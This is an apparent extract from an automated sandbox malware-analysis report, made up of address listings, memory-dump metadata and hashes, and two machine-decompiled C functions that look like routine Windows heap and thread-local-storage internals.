0x04bcb42a
0x04bcb432
0x04bcb436
0x04bcb438
0x04bcb43b
0x04bcb43b
0x04bcb449
0x04bcb44e
0x04bcb454
0x04bcb458
0x04bcb458
0x04bcb45d
0x00000000
0x04bcb45d
0x04bcb3ed
0x00000000
0x00000000
0x00000000
0x04b7d7df
0x04b7d7d2
0x04b7d7ca
0x04bcb37c
0x04bcb37e
0x04bcb385
0x04bcb38a
0x00000000
0x04bcb38a
0x04b7d742
0x04b7d7f1
0x04b7d7f8
0x04bcb49b
0x04bcb49b
0x04b7d800
0x04b7d837
0x04b7d843
0x04b7d845
0x04b7d847
0x04b7d84a
0x04b7d84b
0x04b7d84e
0x04b7d857
0x04b7d802
0x04b7d802
0x04b7d80d
0x00000000
0x04b7d818
0x04b7d818
0x04b7d824
0x04b7d831
0x04bcb4a5
0x04bcb4ab
0x04bcb4b3
0x04bcb4b8
0x04bcb4bb
0x00000000
0x04bcb4c1
0x04bcb4c1
0x04bcb4c8
0x00000000
0x04bcb4ce
0x04bcb4d4
0x04bcb4e1
0x04bcb4e3
0x04bcb4e5
0x00000000
0x04bcb4eb
0x04bcb4f0
0x04bcb4f2
0x04b7dac9
0x04b7dacc
0x04b7dacf
0x04b7dad1
0x04b7dd78
0x04b7dd78
0x04b7dcf2
0x00000000
0x04b7dad7
0x04b7dad9
0x04b7dadb
0x00000000
0x00000000
0x04b7dae1
0x04b7dae1
0x04b7dae4
0x04b7dae6
0x04bcb4f9
0x04bcb4f9
0x04bcb500
0x04b7daec
0x04b7daec
0x04b7daf5
0x04b7daf8
0x04b7dafb
0x04b7db03
0x04b7db11
0x04b7db16
0x04b7db19
0x04b7db1b
0x04bcb52c
0x04bcb531
0x04bcb534
0x04b7db21
0x04b7db21
0x04b7db24
0x04b7dcd9
0x04b7dce2
0x04b7dce5
0x04b7dd6a
0x04b7dd6d
0x00000000
0x04b7dd73
0x04bcb51a
0x04bcb51c
0x04bcb51f
0x04bcb524
0x00000000
0x04bcb524
0x04b7dce7
0x04b7dce7
0x04b7dce7
0x00000000
0x04b7dce7
0x00000000
0x04b7db2a
0x04b7db2c
0x04b7db31
0x04b7db33
0x04b7db36
0x04b7db39
0x04b7db3b
0x04b7db66
0x04b7db66
0x04b7db3d
0x04b7db3d
0x04b7db3e
0x04b7db46
0x04b7db47
0x04b7db49
0x04b7db4c
0x04b7db53
0x04b7db55
0x04b7db58
0x04b7db5a
0x04bcb50a
0x04bcb50f
0x04bcb512
0x04b7db60
0x04b7db60
0x04b7db63
0x04b7db63
0x00000000
0x04b7db63
0x04b7db5a
0x04b7db3b
0x04b7db24
0x04b7db69
0x04b7db69
0x04b7db6c
0x04b7db6f
0x04b7db74
0x04bcb557
0x04bcb557
0x04bcb55e
0x04b7db7a
0x04b7db7c
0x04b7db7f
0x04b7db82
0x04b7db85
0x00000000
0x04b7db8b
0x04b7db8b
0x04b7db8d
0x04b7db9b
0x04b7db9b
0x04b7db9d
0x04b7dba0
0x04b7dba2
0x04b7dba4
0x04b7dba7
0x04b7dba9
0x04b7dbae
0x04b7dbae
0x04b7dbb1
0x04b7dbb4
0x04b7dbb4
0x04b7dbb7
0x04b7dbba
0x04b7dcd2
0x04b7dcd4
0x00000000
0x04b7dbc0
0x04b7dbc0
0x04b7dbd2
0x04b7dbd7
0x04b7dbda
0x04b7dbdd
0x04b7dbdf
0x00000000
0x04b7dbe5
0x04b7dbe5
0x04b7dbee
0x04b7dbf1
0x04bcb541
0x04bcb544
0x00000000
0x04bcb546
0x04bcb546
0x00000000
0x04bcb546
0x04b7dbf7
0x04b7dbf7
0x04b7dbfd
0x04b7dbfd
0x04b7dbff
0x04b7dc0b
0x04b7dc15
0x04b7dc1b
0x04b7dc1d
0x04b7dc21
0x04b7dc21
0x04b7dc23
0x04b7dc23
0x04b7dc26
0x04b7dc29
0x04b7dc2b
0x00000000
0x00000000
0x04b7dc31
0x04b7dc34
0x04b7dc36
0x04b7dcbf
0x04b7dcbf
0x04b7dcc2
0x00000000
0x04b7dc3c
0x04b7dc41
0x04b7dc43
0x00000000
0x04b7dc45
0x04b7dc45
0x04b7dc47
0x00000000
0x04b7dc4d
0x04b7dc4d
0x04b7dc50
0x04b7dc52
0x04b7dc55
0x04b7dcfa
0x04b7dcfe
0x04b7dd08
0x04b7dd0a
0x04b7dd0c
0x00000000
0x04b7dd12
0x04b7dd15
0x04b7dd2d
0x04b7dd2f
0x04b7dd32
0x04b7dd35
0x00000000
0x04b7dd35
0x04b7dc5b
0x04b7dc5b
0x04b7dc5e
0x04b7dc61
0x04b7dc64
0x04b7dc67
0x04b7dc67
0x04b7dc6a
0x04b7dc6c
0x04b7dc8e
0x04b7dc8e
0x04b7dc91
0x04b7dc93
0x04b7dcce
0x04b7dcce
0x04b7dc95
0x04b7dc9c
0x04b7dc6e
0x04b7dc72
0x04b7dc75
0x04b7dc77
0x04b7dc79
0x04bcb551
0x04bcb551
0x00000000
0x04b7dc7f
0x04b7dc7f
0x04b7dc81
0x00000000
0x04b7dc83
0x04b7dc86
0x04b7dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x04b7dc88
0x04b7dc81
0x04b7dc79
0x04b7dc6c
0x04b7dc55
0x04b7dc47
0x04b7dc43
0x00000000
0x04b7dc36
0x04b7dc23
0x00000000
0x04b7dbff
0x04b7dbf1
0x04b7dbdf
0x04b7db8f
0x04b7db92
0x04b7db95
0x00000000
0x00000000
0x00000000
0x00000000
0x04b7db95
0x04b7db8d
0x04b7db85
0x04b7db74
0x04b7dc9f
0x04b7dca2
0x04b7dcb0
0x04b7dcb0
0x04b7dad1
0x04bcb4e5
0x04bcb4c8
0x00000000
0x00000000
0x00000000
0x04b7d831
0x04b7d80d
0x00000000
0x04b7d800
0x04bcb47f
0x04bcb485
0x00000000
0x04bcb485
0x04b7d665
0x04b7d652
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a68bb3c2826d85884ec5d147678a1b36e2e829f2b1b0e7d20fe031bc304d06
Instruction ID: 1a35df1295974fadfc006b1fdc0f10c44e6a8e986f0681b4bc45e39e99784968
Opcode Fuzzy Hash: 93a68bb3c2826d85884ec5d147678a1b36e2e829f2b1b0e7d20fe031bc304d06
Instruction Fuzzy Hash: EDE1AF34B053198FEB249F28D981B6DB7BAFF85344F0441E9D929AB290D734BD81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04B7849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04B7849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4c3f9c0);
				E04BBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4c57b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04B7CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04B82280( *[fs:0x30], 0x4c58550);
						_t139 =  *0x4c57b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04B9F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04B7FFB0(_t193, _t235, 0x4c58550);
								L5:
								return E04BBD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04B61C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4c57b9c; // 0x0
							_t235 = L04B84620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4c57b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04B9A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04B7FFB0(_t193, _t235, 0x4c58550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04B877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04B877F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4c57b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4c57b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04BA37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4c57b9c; // 0x0
									_t214 = L04B84620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04BA37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4c57b10 =  *0x4c57b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4c57b04 =  *0x4c57b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04B877F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04B877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4c57b08 =  *0x4c57b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04BA57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04BAF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04B877F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04B9A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04B877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04BA96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x04b7849b
0x04b7849b
0x04b7849b
0x04b7849b
0x04b7849d
0x04b784a2
0x04b784a7
0x04b784b1
0x04b784d8
0x00000000
0x04b784b3
0x04b784c4
0x04b784c9
0x04b784cd
0x04b784cf
0x04b784cf
0x04b784d6
0x04b784e6
0x04b784e9
0x04b784ec
0x04b784ef
0x04b784f2
0x04b784f4
0x04b784fc
0x04b78501
0x04b78506
0x04b78509
0x04b786e0
0x04b786e5
0x04b786e8
0x04b786ed
0x04b786f0
0x04b786f2
0x04bc9afd
0x04bc9b02
0x04b784da
0x04b784df
0x04b784df
0x04b786fa
0x04b786fd
0x04b786fe
0x04b78701
0x04b78706
0x04b78709
0x04b7870b
0x00000000
0x00000000
0x04b78711
0x04b78725
0x04b78727
0x04b7872a
0x04b7872c
0x04bc9af0
0x04bc9af5
0x04b78732
0x04b78732
0x04b78732
0x04b78735
0x04b78737
0x04b78515
0x04b78515
0x04b78518
0x04b7851d
0x04b78523
0x04b78527
0x04b7852b
0x04b78537
0x04b78539
0x04b7853c
0x04b7853e
0x04b7868c
0x04b78691
0x04b78699
0x04b7869b
0x04b78744
0x04b78748
0x04b786a1
0x04b786a1
0x04b786a1
0x04b786a4
0x04b786a8
0x04bc9bdf
0x04bc9bdf
0x04b786ae
0x04b786b0
0x00000000
0x04b786b6
0x00000000
0x04bc9be9
0x04b786b0
0x04b78544
0x04b7854a
0x04b7854d
0x04b78551
0x04b7876e
0x04b78778
0x04b7877b
0x04b78780
0x04b78557
0x04b78557
0x04b7855d
0x04b7855d
0x04b7856b
0x04b7856e
0x04b78570
0x04b78573
0x04b78576
0x04b78576
0x04b78579
0x04b7857b
0x00000000
0x00000000
0x04b78581
0x04b785a0
0x04b785a2
0x04b785a5
0x04b785a7
0x04bc9b1b
0x04bc9b1b
0x04b7862e
0x04b7862e
0x04b78631
0x04b78631
0x04b78634
0x04b78636
0x04b78669
0x04b78669
0x04b7866b
0x04bc9bbf
0x04bc9bc4
0x04bc9bc8
0x04bc9bce
0x04bc9bce
0x04b78671
0x04b78671
0x04b78674
0x04b78676
0x04bc9bae
0x04bc9bae
0x04b78676
0x04b7867c
0x04b7867e
0x04b78688
0x04b78688
0x00000000
0x04b7867e
0x04b78638
0x04b78638
0x04b7863b
0x04b7863e
0x04b7863f
0x04b78642
0x04b78645
0x04b78648
0x04b7864d
0x04bc9b69
0x04bc9b6e
0x04bc9b7b
0x04bc9b81
0x04bc9b85
0x04bc9b89
0x04bc9ba7
0x04bc9b8b
0x04bc9b91
0x04bc9b9a
0x04bc9b9f
0x04bc9b9f
0x04b78788
0x04b7878d
0x04b78763
0x04b78763
0x04b78766
0x00000000
0x04b78766
0x04bc9b70
0x00000000
0x04bc9b70
0x04b78656
0x04b7865a
0x04b7865c
0x04b78752
0x04b78756
0x00000000
0x00000000
0x04b7875e
0x00000000
0x04b7875e
0x04b78662
0x04b78662
0x04b78662
0x04b78666
0x00000000
0x04b78666
0x04b785b7
0x04b785b9
0x04b785bc
0x04b785bf
0x04b785cc
0x04b785d1
0x04b785d4
0x04b785db
0x04b785de
0x04b785e0
0x04bc9b5f
0x00000000
0x04bc9b5f
0x04b785e6
0x04b785ea
0x04b786c3
0x04b786c5
0x04b786c8
0x04b786ca
0x04bc9b16
0x00000000
0x04bc9b16
0x04b786d6
0x04b785f6
0x04b785f6
0x04b785f9
0x04b78602
0x04b78606
0x04b7860a
0x04b7860b
0x04b7860e
0x04b78611
0x00000000
0x04b78611
0x04b785f3
0x00000000
0x04b785f3
0x04b78619
0x04b7861e
0x04b7861e
0x04b78621
0x04b78622
0x04b78623
0x04b78625
0x04b7862c
0x00000000
0x04b7873d
0x00000000
0x04b7873d
0x04b78737
0x04b7850f
0x04b78512
0x00000000
0x04b78512
0x00000000
0x04b784d6

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd4427baca05f510cd0cb3ba894681aa4862a53968a5bdea6507dbc0ac17310
Instruction ID: f922ba0c223a7661d846cf858e87dab1c4a84be5bbbf68067321c96f40672b13
Opcode Fuzzy Hash: efd4427baca05f510cd0cb3ba894681aa4862a53968a5bdea6507dbc0ac17310
Instruction Fuzzy Hash: 60B13DB4E00209EFEB15EF99C984AADBBB9FF44304F1045ADE425AB245E774BD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04B9513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04B9513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4c5d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04BAD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04B82280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04B84620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04BAF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04B7FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4c5b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04BAB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04b95142
0x04b9514c
0x04b95150
0x04b95157
0x04b95159
0x04b9515e
0x04b95165
0x04b95169
0x04b9516c
0x04b95172
0x04b95176
0x04b9517a
0x04b9517a
0x04b9517a
0x04b9517f
0x04bd6d8b
0x04bd6d8e
0x04bd6d91
0x04bd6d95
0x04bd6d98
0x04bd6d9c
0x04bd6da0
0x04bd6da3
0x04bd6da7
0x04bd6e26
0x04bd6e26
0x04bd6e2a
0x04b951f9
0x04b951f9
0x04b951fe
0x04bd6e33
0x04bd6e33
0x04bd6e39
0x04bd6e3d
0x04bd6e46
0x04bd6e50
0x00000000
0x00000000
0x04bd6e52
0x04bd6e53
0x04bd6e56
0x04bd6e5d
0x00000000
0x00000000
0x00000000
0x04bd6e5f
0x04bd6e67
0x04bd6e77
0x04bd6e7f
0x04bd6e80
0x04bd6e88
0x04bd6e90
0x04bd6e9f
0x04bd6ea5
0x04bd6ea9
0x04bd6eb1
0x04bd6ebf
0x00000000
0x00000000
0x04bd6ecf
0x04bd6ed3
0x00000000
0x00000000
0x04bd6edb
0x04bd6ede
0x04bd6ee1
0x04bd6ee8
0x04bd6eeb
0x04bd6eed
0x04bd6ef0
0x04bd6ef4
0x04bd6ef8
0x04bd6efc
0x00000000
0x00000000
0x04bd6f0d
0x04bd6f11
0x04bd6f32
0x04bd6f37
0x04bd6f3b
0x04bd6f3e
0x04bd6f41
0x04bd6f46
0x00000000
0x00000000
0x04bd6f4c
0x04bd6f50
0x04bd6f50
0x04bd6f54
0x04bd6f62
0x04bd6f65
0x04bd6f6d
0x04bd6f7b
0x04bd6f7b
0x04bd6f93
0x04bd6f98
0x04bd6fa0
0x04bd6fa6
0x04bd6fb3
0x04bd6fb6
0x04bd6fbf
0x04bd6fc1
0x04bd6fd5
0x04bd6fda
